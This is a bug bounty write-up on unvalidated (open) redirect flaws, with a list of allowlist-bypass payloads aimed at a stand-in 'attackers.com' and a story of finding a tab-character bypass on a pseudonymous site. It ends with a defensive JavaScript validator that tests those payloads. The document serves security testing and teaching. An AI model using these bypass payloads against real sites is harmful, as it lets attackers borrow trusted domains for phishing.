Bug Bounty Experience: Unvalidated Redirection Vulnerability

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the application to redirect to a URL contained within that input. This makes it possible for an attacker to redirect the browser to a malicious site while using a trusted domain name to gain the victim’s trust.

Unvalidated redirects and unvalidated forwards are two different vulnerabilities of the same class. This class was in the OWASP Web Top 10 in 2013 but is not in the 2017 Top 10 list.

While testing unvalidated redirects, I have encountered 2 common scenarios:

  1. Straightforward redirections
  2. Tricky redirections

Straightforward redirections

Example:

Request:

https://www.example.com/path123?q=dontforgetethics&url=https://www.attackers.com

Response:

HTTP/1.1 302 Found

Location: https://www.attackers.com

Important pointers while testing:

  • Each and every parameter can be vulnerable, so don’t just blindly look for parameters that contain the string “URL”.
  • Parameters such as callback, next, go, redirect, return, back, etc. can also be vulnerable.
  • Don't forget the first point: each and every parameter can be vulnerable. Parameter “q” (in the URL above), a Referer header, a random key in a cookie, anything can be vulnerable to a redirection attack.

Tricky redirections

A simple payload such as https://www.example.com/path123?q=dontforgetethics&url=https://www.attackers.com might not always work.

There could be validations in place on whitelisted domains, protocols, paths, patterns, etc. In those cases, a little effort is needed to find the bug. Though there are a lot of ways to bypass such validations, a few are:

?url=//attackers.com

(in case http:// is blacklisted)

?url=https:attackers.com

(in case // is blacklisted!)

?url=\/\/attackers.com/

(useful for bypassing blacklists on // and http://. Browsers see \/\/ as //)

?url=

(old but gold, browsers will redirect to anything after ‘@’)

?url=https://whitelisted.com@whitelisted.com@attackers.com

(when there is a validation on whitelisted domain after the first occurrence of ‘@’ symbol)

?url=https://whitelisted.com@attackers.com/abc@whitelisted.com

(when there is a validation on the domain after last occurrence of ‘@’ symbol)

https://whitelisted.com/menu?url=https://attackers.com\whitelisted.com/../../../

(Beauty of ‘\’)

?url=https://whitelisted.com%00attackers.com (Null Byte, depends on context)

?url=https://whitelisted.com%2540attackers.com

?url=https%3a%2f%2fwww.attackers.com?whitelisted.com

(Encoding/double-encoding characters)

This is not an exhaustive set. These are a few of the tried and tested payloads I remember. There are many more. Keep reading and keep trying.

So one fine day,

I was testing a website on one of the bug bounty platforms. Let's call the domain

https://maybesecure.com

Though I always try for XSS, IDORs and other business logic bugs, to my bad luck I couldn’t find any. I also tried for a redirection vulnerability in multiple URL parameters. In a few APIs it was whitelisted properly (I tried my best to bypass), but in a few it was a dummy parameter (the URL parameter had no significance. That hurts!).

While testing I encountered an API path,

https://maybesecure.com/price?code=100&brand=Premium&datein=2020-06-25&dateout=2020-06-26&nb=1&nbmax=1&lang=English

I tried to understand the significance of each parameter and tampered with it accordingly, but nothing seemed spicy! Each wrong tampering redirected me to the error page

http://maybesecure.com/price/error.jsp

Continuing, I changed the parameter “lang” to “xlang”. To my surprise, I got a 302 redirection to a new path which I had not seen before.

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://maybesecure.com/errors/others/index.html

I was happy, as this was a new path containing new parameters, and the URL also seemed to belong to the first category of redirection (Straightforward).

For this URL,

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://maybesecure.com/errors/others/index.html

Response was something like this:

<script>top.window.location="https://maybesecure.com/errors/others/index.html";</script>

I tried different XSS payloads with respect to the reflection context. As XSS is out of scope for this article, I will write about the beautiful problems one could face while identifying XSS in upcoming articles.

For the redirection vulnerability to work, I tried straightforward payloads such as:

Attempt 1:

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://attackers.com

Response:

top.window.location="https://maybesecure.com/https://attackers.com";

Err!! Payload was reflecting as path parameter!

Attempt 2:

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://maybesecure.com/path123

Response:

top.window.location="https://maybesecure.com/path123";

Attempt X:

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=@attackers.com

Response:

top.window.location="https://maybesecure.com/@attackers.com";

I made multiple attempts, such as giving IP addresses, null bytes, encoded URLs and all the tricky known payloads. But no luck!

Then I started combining different characters (%0d, %0a, %00, %08, %03, %0E, etc.) with different payloads and observed the behaviour. Finally, it was %09 which made a difference.

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=%2f%09%2f@attackers.com

Response:

top.window.location="https://maybesecure.com/ /@attackers.com";

Note that %09 is a horizontal tab and hence non-printable (there is a space before ‘/@’). But when it got executed inside the script, it did its magic.

The same vulnerability was present in other subdomains as well and hence, I reported a redirection vulnerability on the “go” parameter for multiple subdomains.

I would say the turning point was the “lang” parameter. If the “lang” parameter is not sent, the application redirects the user to a whole new path. Luckily, the parameter in that new path was vulnerable to a redirection attack. So remember: each and every parameter can be vulnerable. So keep fuzzing!
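From the defender's side, the payload shapes listed under "Tricky redirections" and the %09 case all rely on a gap between a string filter and the way a browser parses the URL. The following added example (not from the original article; the allowlist, base origin and function names are assumptions) parses the value with the WHATWG URL parser, checks the resulting host exactly, and redirects only to the parsed form:

```javascript
// Added example (not from the original article). Assumptions: the allowlist,
// BASE and the function names are hypothetical; inputs are parameter values as
// the server sees them after one round of URL-decoding.
const ALLOWED_HOSTS = new Set(["whitelisted.com"]);
const BASE = "https://whitelisted.com/"; // origin that issues the redirect

// Returns the normalized URL to redirect to, or null if the value is refused.
function safeRedirectTarget(raw, base = BASE, allowed = ALLOWED_HOSTS) {
  if (typeof raw !== "string" || raw === "" || raw.length > 2048) return null;
  // Browsers strip tab/newline and treat "\" as "/" in http(s) URLs, so a
  // string filter and the browser can disagree. Refuse instead of guessing.
  if (/[\u0000-\u0020\u007f\\]/.test(raw)) return null;
  let u;
  try {
    u = new URL(raw, base); // WHATWG parser: same rules the browser applies
  } catch {
    return null; // unparseable, e.g. a host containing an encoded "@"
  }
  if (u.protocol !== "https:") return null;
  if (u.username !== "" || u.password !== "") return null; // no userinfo part
  if (!allowed.has(u.hostname)) return null; // exact host match, never substring
  return u.href; // redirect to the parsed form, never to the raw input
}

// Constructed samples modelled on the payload shapes listed in the article.
const SAMPLES = [
  "/errors/others/index.html", // legitimate relative target
  "https://whitelisted.com/path123", // legitimate absolute target
  "//attackers.com", // protocol-relative
  "https:attackers.com", // same-scheme base: parsed as a relative path
  "\\/\\/attackers.com/", // backslashes
  "https://whitelisted.com@attackers.com", // userinfo before "@"
  "https://whitelisted.com@whitelisted.com@attackers.com",
  "https://whitelisted.com@attackers.com/abc@whitelisted.com",
  "https://attackers.com\\whitelisted.com/../../../",
  "https://whitelisted.com\u0000attackers.com", // decoded null byte
  "https://whitelisted.com%40attackers.com", // %2540 after one decode
  "https://www.attackers.com?whitelisted.com", // allowed name only in query
  "/\t/@attackers.com", // decoded %09: parser strips the tab, leaving "//@..."
];

function audit(samples = SAMPLES) {
  return samples.map((s) => [JSON.stringify(s), safeRedirectTarget(s)]);
}

for (const [input, verdict] of audit()) console.log(input, "=>", verdict);
```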

Crash the clap button if you liked this article 😉

Peace ✌️
